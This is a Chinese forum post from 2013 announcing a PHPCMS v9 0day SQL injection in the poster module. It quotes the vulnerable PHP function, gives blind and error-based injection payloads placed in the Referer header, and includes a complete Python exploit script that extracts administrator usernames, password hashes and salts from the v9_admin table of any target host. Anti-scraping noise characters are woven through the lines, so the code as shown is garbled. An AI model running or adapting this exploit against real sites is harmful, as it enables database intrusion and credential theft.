有人放出了phpcmsv9的0day,就随时写了个利用代码,其中注入代码有两种形式:
' u l' _# F; B/ @6 k) t2 @0 s' t* ~- d; v1 w
问题函数\phpcms\modules\poster\index.php5 M4 i7 E2 }# _8 n2 o6 o
6 `2 L- {9 H( {, h* v X& B
public function poster_click() {* \9 { m9 X3 E
$id = isset($_GET['id']) ? intval($_GET['id']) : 0;
' M2 E0 G+ z9 w9 ]7 E% S$r = $this->db->get_one(array('id'=>$id));: B2 l2 C: g. F+ g: g: [: w7 a
if (!is_array($r) && empty($r)) return false;
4 ~+ X* q( h/ f V% B# g3 D$ip_area = pc_base::load_sys_class('ip_area');" }/ m6 P6 e/ q% |: M- r7 N& Q
$ip = ip();
2 S) x( ]- j! K( w) T$area = $ip_area->get($ip);
0 U$ t. [' y1 T7 e9 Q4 p1 }$username = param::get_cookie('username') ? param::get_cookie('username') : '';
* q1 [, P4 B }" W/ g# h! iif($id) {' o9 ]8 p v9 e( S9 ~. y
$siteid = isset($_GET['siteid']) ? intval($_GET['siteid']) : get_siteid();( f# D3 Q7 b! ~ d# ^' p- [( Y
$this->s_db->insert(array('siteid'=>$siteid, 'pid'=>$id, 'username'=>$username, 'area'=>$area, 'ip'=>$ip, 'referer'=>HTTP_REFERER, 'clicktime'=>SYS_TIME, 'type'=> 1));
# H- ]% h; E- Y* P6 f6 Z. `, L}! c. c; H, V, q( r4 p" w" a1 P
$this->db->update(array('clicks'=>'+=1'), array('id'=>$id));
K$ D3 o4 z* h$ f" ^7 l' _( t7 H$setting = string2array($r['setting']);, N) h! ]; D! x0 l
if (count($setting)==1) {6 V9 M- t/ F7 i+ T7 @
$url = $setting['1']['linkurl'];' y5 x% \6 u: v. P7 `& P# B
} else {
- X& r& n/ z4 f4 A4 m! b/ L$url = isset($_GET['url']) ? $_GET['url'] : $setting['1']['linkurl'];! k7 }7 X5 N* p! e4 n/ F, a
}
' k( R1 O* h, f# ?) ^* F- Wheader('Location: '.$url);
0 K* g& r3 t3 m}
! m. l0 G8 n0 t$ r# [, j. M# l$ L7 a W
8 t8 ` Q" X+ r: y
, h2 E, f% _9 ?6 V& z `1 D利用方式:
/ I0 t8 }: L) f4 G1 X5 l, k
, i! o- `) e, g$ x* ^8 ]; t1、可以采用盲注入的手法:. O$ c: D' b" W3 J, k' S
& Y' W' N' o3 d7 @! Greferer:1′,(select password from v9_admin where userid=1 substr(password,4)=’xxoo’),’1′)#+ b! |, p+ x. N. l# ?2 k
) A. d; @7 [2 N" L8 G- u& S
通过返回页面,正常与否一个个猜解密码字段。
' V. G" l/ @/ {0 l9 l; Y+ l, J% o! I8 [, F9 K
2、代码是花开写的,随手附上了:
! o5 N. h3 ^( l' i7 I2 V
2 v% Q% e, Y, o$ \7 ~1′,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#! n5 b! Y1 S/ _! y5 F& @' m
4 R* z7 M: D) B5 q- u' x7 H8 L
此方法是爆错注入手法,原理自查。( i' k4 N: w: h1 {
$ Y6 C& D( j- d" b! c' }
# D) {' u: O3 J b( t" X9 z6 c
. W r" u, X; W: n( f利用程序:! ]0 I: g7 a6 |3 b
( b9 I: Z- s7 t$ W( o5 {
#!/usr/bin/env python, T% f+ @; L% Y/ ?0 v* S# \% v
import httplib,sys,re) A! s; T" c g: p
9 y$ k9 z1 N3 y9 C* c8 p3 q; }( R
def attack():
' A z5 z; ]" U! O+ p6 s) Dprint “Code by Pax.Mac Team conqu3r!”" }5 ^/ k3 W# r
print “Welcome to our zone!!!”/ K3 }. D% n: A
url=sys.argv[1]
y) C$ j& u2 @0 _/ ^, C" Hpaths=sys.argv[2]- n# }! _2 E, C" f/ [, {& ~; E8 A
conn = httplib.HTTPConnection(url)0 _8 w H1 G3 @0 I
i_headers = {“User-Agent”: “Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1) Gecko/20090624 Firefox/3.5″,
Z- O1 n( c" B# t- ?; O“Accept”: “text/plain”,7 ~! \1 q Q& q4 r
“Referer”: “1′,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#”}4 a) l @9 D g! n
conn.request(“GET”, paths+”/index.php?m=poster&c=index&a=poster_click&sitespaceid=1&id=2″, headers = i_headers)4 ?( i) v! I2 N, P
r1 = conn.getresponse(): R" e2 S$ S) _$ o6 d) u0 I
datas=r1.read()' }0 j% i7 l& a/ v* {% |
datas=re.findall(r”Duplicate entry \’\w+’”, datas)) O3 V2 f8 y: C; n: w: T9 j8 r
print datas[0]
; d. U% q1 T3 }( f* D, Zconn.close()
. n( _2 @6 B/ v& {if __name__==”__main__”:
4 i; I" e+ L+ s/ Q7 Hif len(sys.argv)<3:
2 v1 M6 t% j. Dprint “Code by Pax.Mac Team conqu3r”, n! X+ q; K9 q8 l0 f$ U) v/ ?
print “Usgae:”2 O# J; m1 k b& m9 W
print “ phpcmsattack.py www.paxmac.org /”
. @. S! p- j6 `print “ phpcmsataack.py www.paxmac.org /phpcmsv9/”* X5 Y t( w# ` L. m& `* r1 @
sys.exit(1)! Q% P {+ |# L: D
attack()
7 W0 d. g# v \& G7 Q8 P; v, D9 A* M$ a; f( c( p& [
|
发表于 2013-1-11 21:01:00
收藏
支持
反对